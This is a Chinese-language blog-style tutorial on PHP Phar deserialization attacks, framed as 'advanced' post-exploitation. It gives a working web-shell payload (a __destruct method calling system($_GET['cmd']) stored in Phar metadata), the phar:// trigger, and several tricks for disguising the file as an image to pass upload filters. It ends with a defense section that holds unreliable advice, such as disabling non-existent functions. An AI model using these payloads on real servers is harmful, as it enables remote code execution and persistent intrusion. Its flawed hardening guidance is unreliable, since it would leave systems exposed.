别再只盯着文件上传传马了!用Phar反序列化在PHP里玩点更‘高级’的后渗透
Phar反序列化:超越传统文件上传的高级渗透艺术
在网络安全攻防对抗的演进历程中,攻击手法始终在与防御措施进行着螺旋式上升的博弈。当传统文件上传漏洞被各类WAF和防护规则牢牢盯防时,一种更为隐蔽的攻击方式正在红队评估中崭露头角——Phar反序列化攻击。这种技术巧妙地将反序列化漏洞"存储"在看似无害的图片文件中,实现"一次上传,持久触发"的攻击效果。
1. 从文件上传到Phar反序列化的技术跃迁
1.1 传统文件上传的局限性
常规Webshell上传面临三重困境:
- 检测拦截:现代WAF对常见的一句话木马特征检测准确率已达90%以上
- 权限限制:上传目录通常配置为不可执行权限(如
chmod 644) - 持久性差:一旦被发现可被直接删除,难以维持长期控制
// 典型文件上传检测逻辑示例 $allowed_ext = ['jpg','png']; $file_ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION); if(!in_array($file_ext, $allowed_ext)){ die("Invalid file type!"); }1.2 Phar反序列化的核心优势
对比传统方式,Phar攻击具备独特优势:
| 特性 | 文件上传Webshell | Phar反序列化 |
|---|---|---|
| 文件检测绕过 | 困难 | 容易(如图片格式) |
| 触发条件 | 直接访问 | 文件操作函数调用 |
| 持久性 | 单点失效 | 多点潜伏 |
| 攻击面 | 单一入口 | 全站文件操作接口 |
| 流量特征 | 明显 | 隐蔽 |
2. Phar文件结构与攻击原理深度解析
2.1 Phar的二进制解剖
一个标准的Phar文件包含四个关键部分:
Stub- PHP识别标识,格式要求严格:
<?php __HALT_COMPILER(); ?>Manifest- 存储元数据的核心区域,包含:
- 文件属性
- 序列化的用户自定义数据(攻击载荷载体)
Contents- 实际压缩内容(可伪装为正常文件)
Signature- 可选的哈希校验部分(20字节SHA1+8字节标志)
2.2 反序列化触发机制
攻击流程分为三个阶段:
构造阶段:
class Evil { public function __destruct() { system($_GET['cmd']); } } $phar = new Phar('test.phar'); $phar->setMetadata(new Evil());上传阶段:
- 将.phar文件扩展名改为.jpg/png等允许格式
- 通过文件上传接口传至服务器
触发阶段:
// 通过任意文件操作函数触发 file_exists('phar://uploads/fake.jpg');
关键点:PHP在解析phar文件时会自动反序列化manifest中的metadata,无需文件包含漏洞
3. 实战中的高级利用技巧
3.1 绕过上传限制的六种方法
扩展名伪装:
mv payload.phar payload.jpg文件内容混淆:
with open('real.jpg','rb') as f: jpg_header = f.read(100) with open('payload.phar','rb') as f: phar = f.read() with open('final.jpg','wb') as f: f.write(jpg_header + phar[100:])Polyglot文件构造:
- 制作同时符合JPEG和PHAR格式的文件
- 通过010 Editor手动调整文件结构
压缩包转换:
zip payload.zip payload.phar mv payload.zip payload.jpg流量混淆:
- 分块上传
- 编码转换(Base64/Hex)
二次渲染绕过:
- 分析目标图像处理库的渲染逻辑
- 确保关键结构不被破坏
3.2 反序列化链(POP Chain)构造艺术
优质攻击链需要满足:
- 入口点:具备可控参数的文件操作函数
- 跳板:合适的魔术方法组合:
class VulnClass { public function __wakeup() {...} public function __destruct() {...} public function __toString() {...} } - 执行点:最终达成代码执行/文件操作的方法
典型链式调用示例:
__destruct() -> __call() -> file_put_contents()4. 防御体系构建与对抗策略
4.1 企业级防护方案
分层防御矩阵应包含:
输入层控制:
- 文件内容签名校验(非扩展名检测)
- 强制重命名上传文件
$new_name = hash('sha256', $content).'.dat';运行层防护:
; php.ini配置 phar.readonly = On disable_functions = phar_open,phar_file代码层规范:
- 禁止动态调用文件操作函数
- 使用白名单限制文件操作路径
4.2 攻击检测的三大维度
静态检测:
- Phar文件特征扫描(Stub标识)
- 序列化数据模式识别
动态监控:
# 监控可疑文件操作 auditctl -w /var/www/uploads -p war -k web_upload流量分析:
- 异常phar协议请求统计
- 反序列化操作行为基线
在真实红队评估中,我们曾通过Phar攻击在严格防护的目标中建立了三个月以上的持久化通道。这种技术的精妙之处在于它将漏洞利用从"文件上传"这个单一维度,扩展到了所有可能触发文件操作的业务接口——从头像上传到文档导入,从缓存清理到备份恢复,每个文件接触点都可能成为攻击入口。